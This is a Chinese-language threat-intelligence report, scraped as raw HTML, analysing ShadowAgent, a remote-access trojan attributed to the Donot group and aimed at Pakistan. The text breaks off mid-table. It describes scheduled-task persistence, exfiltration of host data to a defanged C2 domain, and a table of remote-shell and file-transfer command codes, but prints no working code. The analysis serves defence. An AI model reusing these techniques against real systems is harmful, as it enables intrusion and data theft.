135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 一、概述 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">近期360安全大脑监测到肚脑虫组织针对巴基斯坦的攻击活动，此次活动中使用新型的远控木马--ShadowAgent，该木马对进程图标进行伪装，诱使用户点击，使用WebSocket+HTTP与服务器进行通信。本文将对攻击活动相关组件进行分析。</span></span></span></p><div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 一、攻击活动分析 </span></span></strong></span></span></p></div><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">1. 攻击流程分析</span></span></strong></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">本次攻击活动中，该组织使用含有木马的压缩包作为攻击载体。文件解压后，压缩包内包含两个诱饵文档，以及一个将恶意木马程序伪装成PDF文档图标的可执行文件。当用户误执行该木马后，其首先会从自身的资源段中读取经过加密的配置信息，随后通过创建计划任务的方式在系统中建立持久化驻留。最终，该木马会窃取用户设备上的敏感数据并外传至攻击者控制的服务器。</span></span></p><p style="letter-spacing: 0.578px;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023922" class="rich_pages wxw-img" data-ratio="0.4131944444444444" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=80d58495&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicFkI0pP1pDZvibGQDfKN5brmwHH8QweGpl7H8oGNwlL11sR1qqfmfMog%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p></div></div><div><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2. 恶意载荷分析</span></span></strong></span></p></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在本次攻击活动中，捕获的恶意样本基础信息如下：</span></span></p></div></div><table style="width:576px;"><tbody><tr><td data-colwidth="127"><p><span leaf="">MD5</span></p></td><td data-colwidth="449"><p><span leaf="">1c335be51fc637b50d41533f3bef2251</span></p></td></tr><tr><td data-colwidth="127"><p><span leaf="">文件名称</span></p></td><td data-colwidth="449"><p><span leaf="">OPS-VII-SIR.zip</span></p></td></tr><tr><td data-colwidth="127"><p><span leaf="">文件大小</span></p></td><td data-colwidth="449"><p><span leaf="">1.04 MB (1088584 bytes)</span></p></td></tr><tr><td data-colwidth="127"><p><span leaf="">文件类型</span></p></td><td data-colwidth="449"><p><span leaf="">zip</span></p></td></tr></tbody></table><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">压缩包内嵌文件如下：</span></span></p></div></div><p><span leaf=""><img data-imgfileid="100023923" class="rich_pages wxw-img" data-ratio="0.16666666666666666" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=39add99e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicCGCyOGTud1icjAlOCWUDXgchnhPqTOzhwE6BIF7lRwoib64IVTsCn2kQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">基于对该诱饵文档的详细内容分析，推测此次攻击活动目标为巴基斯坦。</span></span></p></div></div><p><span leaf=""><img data-imgfileid="100023924" class="rich_pages wxw-img" data-ratio="0.53125" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=9927d534&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicxXibTydX9zfFcyqfcPvSAChT9JELFibwRYlgdMKlqep7BKmiblibPIfoBQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">样本运行后首先从可执行文件中加载名为“TYPELIB”的资源段。该资源段大小为0x1A1字节，整体内容以加密形式存储，用于隐藏核心运行参数与通信配置。</span></span></p><p><span leaf=""><img data-imgfileid="100023925" class="rich_pages wxw-img" data-ratio="0.2208092485549133" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=345955b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicO60PKE3dibXwozeEPMoYemoROHONicVibLzYCfqS0O1M0FXLaknP30IZA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span leaf=""><img data-imgfileid="100023926" class="rich_pages wxw-img" data-ratio="0.5398843930635838" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=ead3c39f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicsnx8r3NqNtnn2kTibFlPVpHXQNPgo7tSDRy7gLH26o630ETNv4S6iaEQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">解密后的配置如下：</span></span></p></div></div><p style="text-align: center;"><span leaf=""><img data-imgfileid="100023928" class="rich_pages wxw-img" data-ratio="1" data-type="png" data-w="743" style="width: 538px;height: 538px;" src="https://wechat2rss.xlab.app/img-proxy/?k=2a7fb83a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicUlXv5MzIOicWQJc41ibDgbPMdyGJMjE4AAliaupkicBbUFIRDASlDzI1Hw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">样本通过schtasks创建名为“NVIDIA_taskHost”的伪装计划任务，每天上午9:00自动执行恶意文件Annexure.exe，用于在系统中维持持久化。</span></span></p><p><span leaf=""><img data-imgfileid="100023929" class="rich_pages wxw-img" data-ratio="0.36689814814814814" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=235e56b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicKCPPTdkLPkibZ0icc6FeAbfJIaHS4Su5JxOUqLrLkLK906BazNxlSQQQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">接着将获取到的用户信息进行拼接，其中包括设备标识、主机名、用户名、安全产品等。</span></span></p></div></div><p><span leaf=""><img data-imgfileid="100023930" class="rich_pages wxw-img" data-ratio="0.29595375722543354" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=ad8affd5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicvkrOKpkMm3hQaLXqKO8z7fXO9dsfdGVyHd4z0O4EdIcpJv1qAVv7jw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">样本将收集到的用户信息JSON结构打包，以post请求的方式发送至远程服务器（www.mydropboxbackup[.]com:443）。</span></span></p><p><span leaf=""><img data-imgfileid="100023931" class="rich_pages wxw-img" data-ratio="0.4300578034682081" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=a5db85a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicq8OpQv1MfDGhplRMMLPpbafFPeSFVz6FSRgiccW4cRRvkVDuH8HII2Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">接着会对比服务器响应的数据，是否为如下值。</span></span></p></div></div><p><span leaf=""><img data-imgfileid="100023932" class="rich_pages wxw-img" data-ratio="0.3514450867052023" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=7dfd6eba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCiczicMRA9giaY3JLKQRdSuDt1mvE41POduHoaLMcd6h4fNOtHRWFqvYxsaIw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">构造WebSocket URL，用于与远控服务器建立连接。</span></span></p></div></div><p><span leaf=""><img data-imgfileid="100023933" class="rich_pages wxw-img" data-ratio="0.21180555555555555" data-type="png" data-w="864" src="https://wechat2rss.xlab.app/img-proxy/?k=4ad4fbae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PqBA27LgES6yTDeiaWVKCicziceBtEXPm2RUtonypA6AeHRbaW6iap7gDgibadVhn8HRbdDo3BPic5qgcRQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">木马上线后，主控端WebSocket发送指令从而对受害者机器实现远程控制，指令格式同样为json格式。</span></span></p></div></div><table style="width:572px;"><tbody><tr><td data-colwidth="204"><p><span leaf="">指令</span></p></td><td data-colwidth="368"><p><span leaf="">功能</span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">input</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">用于向开启的cmd或powershell进行指令输入</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">F1A5C3</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">读取cmd或powershell中指令执行结果</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">B8C1D2</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">创建cmd</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">E4F5A6</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">创建powershell</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">FL_SH1</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">结束cmd或powershell</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">C9E3D4</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 17px;">E7F8A9</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 17px;">H1k4R8</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 17px;">C0V3RT</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">组合指令，主要功能从指定url下载数据。</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 17px;">支持指定zip文件下载，并支持密码参数。</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">F2B3C4</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">磁盘遍历</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">D5E6F7</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">文件上传</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">A8B9C0</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">文件下载</span></span></p></td></tr><tr><td data-colwidth="204"><p><span leaf=""><span textstyle="" style="font-size: 17px;">D1E2F3</span></span></p></td><td data-colwidth="368"><p><span leaf=""><span textstyle="" style="font-size: 17px;">文件删除</span></span></p></td></tr><tr><td 